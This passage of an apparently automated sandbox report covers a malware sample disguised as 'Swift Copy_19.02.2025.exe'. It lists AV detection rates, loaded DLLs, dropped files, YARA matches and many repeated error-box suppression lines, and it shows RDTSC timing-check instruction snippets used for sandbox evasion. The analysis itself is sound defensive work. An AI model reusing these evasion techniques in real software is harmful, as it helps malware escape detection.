        Source: Swift Copy_19.02.2025.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: Swift Copy_19.02.2025.exeReversingLabs: Detection: 44%
        Source: Swift Copy_19.02.2025.exeVirustotal: Detection: 52%
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeFile read: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\Swift Copy_19.02.2025.exe "C:\Users\user\Desktop\Swift Copy_19.02.2025.exe"
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess created: C:\Users\user\Desktop\Swift Copy_19.02.2025.exe "C:\Users\user\Desktop\Swift Copy_19.02.2025.exe"
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess created: C:\Users\user\Desktop\Swift Copy_19.02.2025.exe "C:\Users\user\Desktop\Swift Copy_19.02.2025.exe"Jump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeSection loaded: oleacc.dllJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeSection loaded: shfolder.dllJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
        Source: timelanges.lnk.0.drLNK file: ..\..\..\Program Files (x86)\Common Files\prgedes.paa
        Source: timelanges.lnk0.0.drLNK file: ..\..\..\Program Files (x86)\Common Files\prgedes.paa
        Source: Swift Copy_19.02.2025.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

        Data Obfuscation

        barindex
        Source: Yara matchFile source: 00000000.00000002.2371134333.0000000004638000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.2559828926.0000000002CB8000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeCode function: 0_2_703D1B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_703D1B5F
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeCode function: 6_2_03F9891E pushad ; iretd 6_2_03F9891F
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeCode function: 6_2_03F98DDF push esp; iretd 6_2_03F98DE0
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeCode function: 6_2_03F98C2F pushfd ; iretd 6_2_03F98C30
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeFile created: C:\Users\user\AppData\Local\Temp\nszB838.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeAPI/Special instruction interceptor: Address: 4E69A7A
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeAPI/Special instruction interceptor: Address: 34E9A7A
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeRDTSC instruction interceptor: First address: 4E40798 second address: 4E40798 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007FAED8FF8AE7h 0x00000006 test dl, 00000025h 0x00000009 inc ebp 0x0000000a inc ebx 0x0000000b rdtsc
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeRDTSC instruction interceptor: First address: 34C0798 second address: 34C0798 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007FAED8BAD6A7h 0x00000006 test dl, 00000025h 0x00000009 inc ebp 0x0000000a inc ebx 0x0000000b rdtsc
        Source: C:\Users\user\Desktop\Swift Copy_19.02.2025.exeMemory allocated: 3F40000 memory reserve | memory write watchJump to behavior
